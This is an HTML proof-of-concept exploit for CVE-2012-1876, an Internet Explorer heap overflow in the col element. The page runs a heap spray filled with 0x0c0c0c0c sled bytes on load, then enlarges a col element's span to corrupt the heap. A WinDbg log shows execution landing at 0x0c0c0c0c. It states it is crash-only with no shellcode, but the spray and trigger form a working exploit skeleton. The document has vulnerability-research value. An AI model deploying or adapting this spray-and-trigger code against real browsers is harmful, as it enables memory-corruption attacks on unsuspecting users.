  1. <html>
  2. <head>
  3. <title>CVE-2012-1876 PoC</title>
  4. </head>
  5. <body onload="_crash()">
  6. <TABLE style="table-layout: fixed;">
  7.     <colgroup id="cg" width="2021161">
  8.     <col id="cl" span="2">
  9.     <col>
  10.     </colgroup>
  11.     <TR>
  12.         <TD>XXXX</TD>
  13.     </TR>
  14. </TABLE>
  15. <script>
  16. /*******
CVE-2012-1876 IE col element heap overflow PoC. Crash-only: the spray below carries no shellcode (just 0x0c0c0c0c sled bytes and 0x4141 padding), so when control reaches 0x0c0c0c0c it faults there, as the debugger output below shows.
  18. Canberk Bolat - cbolat.blogspot.com
  19.  
cg's width = 2021161 (2021161 * 100 = 0x0c0c0c04); after the overflow the corrupted heap entry's Blink->Flink holds exactly this value (see the !heap output below).
  21.  
  22. (1014.1158): Access violation - code c0000005 (first chance)
  23. First chance exceptions are reported before any exception handling.
  24. This exception may be expected and handled.
  25. eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
  26. eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0         nv up ei pl nz na po nc
  27. cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
  28. 0c0c0c0c 0c0c            or      al,0Ch
  29. 1:019> !heap -x 0c0c0c0c
  30. List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
  31. HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted
  32.  
  33. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
  34. HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted
  35.  
  36. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
  37. HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted
  38.  
  39. ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
  40. HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
  41. **********/
  42.  
// The <col id="cl"> element whose span is widened in _crash(); resolved once
// here, at script run time, after the table above has been parsed.
var targetObj = document.getElementById("cl");
  44.  
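/**
 * Heap spray: allocates 178 strings of ~1 MiB each, filled with 0x0c0c0c0c
 * bytes and terminated by 48 x 0x4141, so that the corrupted heap pointer
 * (Blink->Flink = 0c0c0c04, eip = 0c0c0c0c in the debugger log above) lands
 * inside attacker-controlled memory.
 *
 * The original was a one-line comma-chained loop that assigned to three
 * undeclared names (S, k, y): that throws ReferenceError in strict mode and
 * leaks three globals into the page. This version uses locals and keeps the
 * spray reachable through spray.blocks (and the return value) so the blocks
 * are not garbage-collected before _crash() triggers the overflow.
 *
 * @returns {string[]} the 178 spray blocks (also retained as spray.blocks)
 */
function spray() {
  var DOUBLINGS = 19;     // "\u0c0c" doubled 19 times -> 2^19 UTF-16 units (1 MiB)
  var BLOCK_COUNT = 178;  // original loop filled k[20..197]
  var TRIM = 60;          // kept from the original; presumably an allocation-size alignment tweak
  var NOP_SLED = "\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c";
  var PADDING =
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141" +
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141" +
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141" +
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141" +
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141" +
    "\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141";  // 48 x 0x4141, as in the original

  var chunk = "\u0c0c";
  var i;
  for (i = 0; i < DOUBLINGS; i++) {
    chunk += chunk;
  }

  var blocks = [];
  for (i = 0; i < BLOCK_COUNT; i++) {
    blocks.push(NOP_SLED + chunk.substr(TRIM) + PADDING);
  }

  // Retain on the function object instead of an implicit global.
  spray.blocks = blocks;
  return blocks;
}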
  48.  
/**
 * Trigger, run from <body onload>: populate the heap with spray() first, then
 * mutate the <col id="cl"> element — set chOff, then raise span from its
 * parsed value of 2 to 400. That presumably forces the fixed-layout table to
 * re-lay out; the debugger log in the header comment shows heap list entries
 * corrupted with the colgroup width afterwards.
 */
function _crash() {
  spray();
  var col = targetObj;
  col.chOff = 10;
  col.span = 400;
}
  55. </script>  
  56. </body>
  57. </html>